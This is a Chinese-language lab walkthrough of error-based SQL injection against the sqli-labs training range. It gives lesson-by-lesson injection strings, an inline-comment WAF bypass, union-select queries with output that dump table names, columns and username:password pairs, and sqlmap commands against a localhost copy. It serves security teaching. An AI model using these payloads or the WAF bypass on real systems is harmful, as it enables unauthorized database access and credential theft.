当前用户:select user();
所有数据库:show databases;
当前数据库:select database();
当前版本:select version();
mysql常用注释符:#或–空格或/**/ 空格也就是%20
内联注释:/!SQL语句/只有MySQL可以识别,常用来绕过WAF
select * from articles where id=id
使用内联注释注入:
select * from articles where id=-1 /*!union*//*!select*/ 1,2,3,4
根据注入位置数据类型可将SQL注入分为两类:数字型和字符型
GET基于报错的SQL注入:实验靶场:sqli-labs less1~4提示:报错默认加了单引号,去掉单引号,才是真正SQL语句的报错
less1:
输入:?id=14'
报错:''14'' LIMIT 0,1'
猜测:select login_name,password from admin where id = 'id' limit 0,1
解决:?id=14' --+
less2:
输入:?id=14'
报错: '' LIMIT 0,1'
猜测:select login_name,password from admin where id = id limit 0,1
解决:/?id=14 --+'
less3:
输入:?id=14'
报错: ''14'') LIMIT 0,1'
猜测:select login_name,password from admin where id = ('id') limit 0,1
解决:?id=14') --+
less4:
输入:?id=14“
报错:'"14"") LIMIT 0,1'
猜测:select login_name,password from admin where id = ("id") limit 0,1
解决:?id=14") --+
GET基于报错的SQL注入利用:
- 利用order by 判断字段数
- 利用union select 联合查询,获取表名
?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
- 利用union select 联合查询,获取字段名
?id=0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
- 利用union select 联合查询,获取字段值
?id=0' union select 1,group_concat(username,password),3 from users --+
例子less 1 详解:
输入:?id=1' order by 3 --+
输出:正常
再输入 :?id=1' order by 4 --+
输出:报错
由此推断为3列
再输入:?id=0' union select 1,user(),database() --+
输出:Your Login name:root@localhost
Your Password:security
由此得到当前mysql用户和当前数据库名,也可version()得到数据库版本
再输入:?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
输出:Your Login name:emails,referers,uagents,users
Your Password:3
由此得到所有的表名
再输入:?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
输出:Your Login name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,user,pass,ip,login_time,status,ppp,id,username,password,sex,work,phone,id,username,password,id,user,pass,ip,login_time,status,ppp
Your Password:3
由此得到users表的所有字段名
再输入:?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
输出:Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3
由此得到users表中username和password字段的所有值
sqlmap安全测试:–batch:表示默认操作
爆数据库:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs --batch
爆表名:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables --batch
爆字段:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns --batch
爆字段值:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump --batch